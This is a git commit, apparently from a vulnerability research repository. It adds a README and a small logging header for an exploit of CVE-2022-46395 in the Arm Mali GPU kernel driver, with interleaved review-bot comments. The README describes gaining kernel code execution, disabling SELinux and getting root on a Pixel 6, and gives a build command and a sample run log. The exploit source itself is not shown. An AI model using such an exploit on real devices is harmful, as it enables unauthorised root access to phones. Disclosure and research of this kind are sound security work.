m-y-mo committed Feb 24, 2023
commit 2c1e4be2af5336fd6d90658feff3c2fd855e8353
54 changes: 54 additions & 0 deletions SecurityExploits/Android/Mali/CVE_2022_46395/README.md
@@ -0,0 +1,54 @@
## Exploit for CVE-2022-46395

The write up can be found [here](). This is a bug in the Arm Mali kernel driver that I reported in November 2022. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.

The exploit is tested on the Google Pixel 6 with the Novmember 2022 and January 2023 patch. For reference, I used the following command to compile with clang in ndk-21:

```
android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o mali_user_buf
```

The exploit should be run a couple of minutes after boot and is likely to have to run for a few minutes to succeed. It is not uncommon to fail the race conditions hundreds of times, although failing the race condition does not have any ill effect and the exploit as a whole rare crashes. If successful, it should disable SELinux and gain root.

```
oriole:/ $ /data/local/tmp/mali_user_buf
fingerprint: google/oriole/oriole:13/TQ1A.230105.002/9325679:user/release-keys
benchmark_time 357
failed after 100
failed after 200
failed after 300
benchmark_time 343
failed after 400
failed after 500
failed after 600
benchmark_time 337
failed after 700
failed after 800
failed after 900
benchmark_time 334
failed after 1000
failed after 1100
failed after 1200
benchmark_time 363
failed after 1300
finished reset: 190027720 fault: 135735849 772 err 0 read 3
found pgd at page 4
overwrite addr : 76f6100710 710
overwrite addr : 76f5f00710 710
overwrite addr : 76f6100710 710
overwrite addr : 76f5f00710 710
overwrite addr : 76f5d00710 710
overwrite addr : 76f5b00710 710
overwrite addr : 76f5d00710 710
overwrite addr : 76f5b00710 710
overwrite addr : 76f6100fd4 fd4
overwrite addr : 76f5f00fd4 fd4
overwrite addr : 76f6100fd4 fd4
overwrite addr : 76f5f00fd4 fd4
overwrite addr : 76f5d00fd4 fd4
overwrite addr : 76f5b00fd4 fd4
overwrite addr : 76f5d00fd4 fd4
overwrite addr : 76f5b00fd4 fd4
result 50
oriole:/ #
```
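Review bot: The write-up link in the opening line is empty (`[here]()`), so the README points readers at nothing; either fill in the URL before merging or drop the link until the post is published. Two small wording fixes in the same hunk: "Novmember 2022" should read "November 2022", and "the exploit as a whole rare crashes" should read "rarely crashes". It would also help to state which device build the sample session was captured on, since the fingerprint line in the transcript (`TQ1A.230105.002`) is the only place that detail appears.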
11 changes: 11 additions & 0 deletions SecurityExploits/Android/Mali/CVE_2022_46395/log_utils.h
@@ -0,0 +1,11 @@
#ifndef LOG_UTILS_H
#define LOG_UTILS_H

#ifdef SHELL
#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__)
#else
#include <android/log.h>
#define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__)
#endif

#endif
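Review bot: The `SHELL` branch expands `LOG` to `printf`, but the header never includes `<stdio.h>`, so any translation unit that includes `log_utils.h` and uses `LOG` only compiles if it happens to include `<stdio.h>` itself first. Adding `#include <stdio.h>` inside the `#ifdef SHELL` branch, mirroring the `#include <android/log.h>` in the `#else` branch, makes the header self-contained. Note also that `##__VA_ARGS__` is a GNU/Clang extension rather than standard C, which is fine for the NDK clang build described in the README but worth a one-line comment so nobody tries to build it with a strict-conformance compiler.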